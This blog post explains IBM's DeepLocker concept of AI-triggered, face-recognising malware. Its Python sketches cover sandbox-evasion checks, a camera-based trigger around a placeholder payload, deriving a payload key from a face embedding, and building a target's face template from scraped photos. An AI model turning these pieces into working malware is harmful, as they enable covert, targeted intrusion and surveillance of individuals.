Hacking Your Face

Okay, so that’s a bit of an ambiguous title. I don’t mean using tricks to make yourself look better or hitting yourself in the face with a meat cleaver. What I’m referring to is a new form of malware that actually uses your computer or device’s camera to look at you and identify you before it begins to hack you. It’s a pretty scary scenario that has now become reality. Welcome to the new era of hacking.

As the cyber world evolves into the artificial intelligence (AI) realm, so too does hacking. For now, such AI-assisted malware is in its infancy; however, IBM researchers have developed a proof-of-concept AI malware package called DeepLocker. DeepLocker is malware that does not deploy until it finds a specific victim, and it identifies that victim using AI, namely, the pattern-recognition properties of a neural network. According to the researchers, the use of a neural network makes the malware much more difficult to detect.

Defense against most malware is based on analyzing its composition and matching it against known patterns. Malware, therefore, tries to find ways to hide these patterns to avoid detection. Well-designed malware will not deploy unless it detects a safe environment. For example, malware will scan a network it has infiltrated for any indication of a sandbox or any sign that it has been lured into a honeypot. If the malware finds something suspicious, it won't deploy. Once deployed, however, the malware gives away information about its design, after which anti-malware defenses are updated.
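
To make the idea concrete, here is a minimal Python sketch of the kind of environment check such malware performs before deploying. The specific indicators used, virtualization-vendor MAC prefixes and an unusually low CPU count, are common illustrative examples, not an exhaustive or definitive list.

```python
import os
import uuid

# MAC-address prefixes (OUIs) registered to common virtualization vendors;
# seeing one is a weak hint that the host is a VM, possibly a sandbox.
VM_MAC_PREFIXES = ("00:05:69", "00:0c:29", "00:50:56", "08:00:27")

def looks_like_sandbox() -> bool:
    raw = "{:012x}".format(uuid.getnode())
    mac = ":".join(raw[i:i + 2] for i in range(0, 12, 2))
    if mac.startswith(VM_MAC_PREFIXES):   # virtualization-vendor NIC
        return True
    if (os.cpu_count() or 0) < 2:         # sandboxes are often given one vCPU
        return True
    return False

if looks_like_sandbox():
    # A cautious payload simply stays dormant, revealing nothing.
    raise SystemExit
```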

As an example, notice how the famous Stuxnet worm inspected the network before determining what to do next (stages 2 and 3 in the diagram below).

[Diagram: the stages of a Stuxnet attack]

DeepLocker hides itself in normal-looking software, which behaves normally unless certain trigger conditions are present. These triggers can be any number of things, such as a matching GPS location or a recognized voice, but for the purposes of this article, I'll focus on facial recognition.

Neural networks are pattern recognizers. They can be trained to identify certain patterns, such as faces. If the neural network integrated with the malware has been pre-trained to recognize a particular face, it will trigger the payload to deploy only when that pattern, that face, is recognized. To do this, the malware needs access to the device's camera. Thus, any software that requires the use of a camera, such as video calling or conferencing software, would be an ideal package for this type of malware.
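
As a rough sketch of how such a trigger might work, consider the following Python snippet. It grabs a frame from the camera with OpenCV and compares the face's embedding against a stored target embedding using cosine similarity. The embed_face() and deploy_payload() functions are hypothetical placeholders, standing in for a pre-trained face-embedding network and the hidden payload respectively, and the threshold value is likewise illustrative.

```python
import numpy as np
import cv2  # pip install opencv-python

TARGET = np.load("target_embedding.npy")  # embedding baked in by the attacker
THRESHOLD = 0.92                          # illustrative similarity cutoff

def embed_face(frame) -> np.ndarray:
    """Hypothetical stand-in for a pre-trained face-embedding network."""
    raise NotImplementedError("replace with a real embedding model")

def deploy_payload() -> None:
    """Placeholder for the concealed malicious payload."""

def frame_matches_target(frame) -> bool:
    emb = embed_face(frame)
    # Cosine similarity between the live face and the target embedding.
    sim = float(np.dot(emb, TARGET) /
                (np.linalg.norm(emb) * np.linalg.norm(TARGET)))
    return sim >= THRESHOLD

cam = cv2.VideoCapture(0)  # the same camera the host app legitimately uses
ok, frame = cam.read()
if ok and frame_matches_target(frame):
    deploy_payload()
cam.release()
```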

The problem comes with trying to defend against this type of malware. The only ones who know the raison d'être of the neural net pattern associated with the malware are those who created it; the attacked network cannot reverse-engineer it. Even the connection between the trigger and the payload can be encrypted or otherwise obfuscated. In short, it would be very difficult to conclude that an attack was underway, or even that one had taken place. Here is a diagram showing the concealment such malware can use.

[Diagram: how DeepLocker conceals its trigger conditions and payload]
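
In DeepLocker's design, as IBM described it, this concealment goes a step further: the key that decrypts the payload is derived from the neural net's output, so without the right input, the right face, the payload remains an undecipherable blob. Here is a minimal Python sketch of that idea using the cryptography library; the rounding step is a crude stand-in for the fuzzy-extraction schemes a real implementation would need, since embeddings vary slightly from frame to frame.

```python
import base64
import hashlib
import numpy as np
from cryptography.fernet import Fernet, InvalidToken  # pip install cryptography

def key_from_embedding(emb: np.ndarray) -> bytes:
    # Quantize the embedding so the same face reliably yields the same bytes,
    # then hash those bytes into a key. Without an input that produces the
    # right embedding, the key -- and thus the payload -- is unrecoverable.
    quantized = np.round(emb, 1).tobytes()
    digest = hashlib.sha256(quantized).digest()
    return base64.urlsafe_b64encode(digest)  # 32 bytes -> a valid Fernet key

def try_unlock(encrypted_payload: bytes, emb: np.ndarray):
    try:
        return Fernet(key_from_embedding(emb)).decrypt(encrypted_payload)
    except InvalidToken:
        return None  # wrong face: the payload stays an opaque blob
```

An analyst who captures such a sample sees only a hash routine, an encrypted blob, and an opaque model; none of them reveals who the trigger is or what the payload does.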

If malware like DeepLocker wanted to target you, it would first need to get you to download and install software that gives it access to the pattern it was designed to look for. It could, theoretically, do this through a fake update of software already installed on your device. A sufficiently advanced attacker could scan your system or network to see what software avenues are available and then develop a recognition pattern that makes use of the pre-installed software. For instance, it could build a voice or facial recognition model around your pre-installed video chat program and use that program to target you.

The best way to develop such malware would be to train the neural net through direct communication with the victim: the attacker could record the interaction and thereby obtain enough data to train the net for a future attack. That said, few people would accept a video call from a stranger. Malware that takes control of a device's camera and microphone is readily available, but it could be detected by security architecture. The only way to train the neural net without infiltrating the network or device is to use publicly available videos and photos. Thus, the greater your online presence, the more susceptible you would be to such an attack.
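
To see why public photos are enough, here is a sketch of how an attacker might build the target embedding from scraped images, assuming the open-source face_recognition library; the folder path is hypothetical. Averaging the per-photo encodings yields a single reference template, and the more photos available, the more robust that template becomes.

```python
import glob
import numpy as np
import face_recognition  # pip install face_recognition

# Publicly available photos of the target (hypothetical folder).
encodings = []
for path in glob.glob("scraped_photos/*.jpg"):
    image = face_recognition.load_image_file(path)
    faces = face_recognition.face_encodings(image)  # one 128-d vector per face
    if faces:
        encodings.append(faces[0])  # assume the target is the first face found

if encodings:
    # Average the per-photo encodings into one reference embedding.
    target = np.mean(encodings, axis=0)
    np.save("target_embedding.npy", target)  # shipped inside the malware
```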

It should be noted that no such attacks have been detected in the wild. Then again, how would they be detected? The malware would only be vulnerable to defense strategies in the earliest stages of an attack, and those capable of designing such a targeted attack would have access to multiple cyber attack resources and be in a position to obfuscate every stage. That's right: most of these attacks would come from nation states, because the resources and knowledge needed to develop them are beyond those of most unaffiliated hackers.

So, if these attacks were developed, they would not be widely distributed, at least at the beginning. Only high-profile targets with a substantial online presence would be victimized, since that online presence is what provides the training set for the neural net. The target would also need to possess information or data valuable enough to be worth the time required to design the attack. If you fit this profile, you may want to begin your defense by at least putting some tape over your laptop's camera lens and disabling your microphone.

It would not surprise me if intelligence agencies already possessed such malware, but if they don't, they soon will. Low-profile but valuable, highly secured targets may still get hacked with such malware, though this would require more advanced attack techniques. For example, the time is not far off when someone could call a target using voice simulation software that makes the caller sound like someone the target knows. This could be a way to gather voice samples from the target for training a neural net for a future attack. As is often the case, the cybersecurity community has been put on the back foot by this new attack vector. At least for a while, the defense against AI attacks like DeepLocker will be more reactive than proactive. Efforts are being made to decode neural nets before they deploy, but major attacks using this vector will likely succeed long before such defenses mature. For those in the cybersecurity community, there are some hard times ahead.

About Steve Mierzejewski

Marketing consultant for InZero Systems, developer of the next generation in hardware-separated security: WorkPlay Technologies, TrustWall, and Mobile bare-metal virtualization. I've worked in Poland, Japan, Korea, China, and Afghanistan. I'm a writer, technical editor, and educator. I also do some work as a test developer for Michigan State University.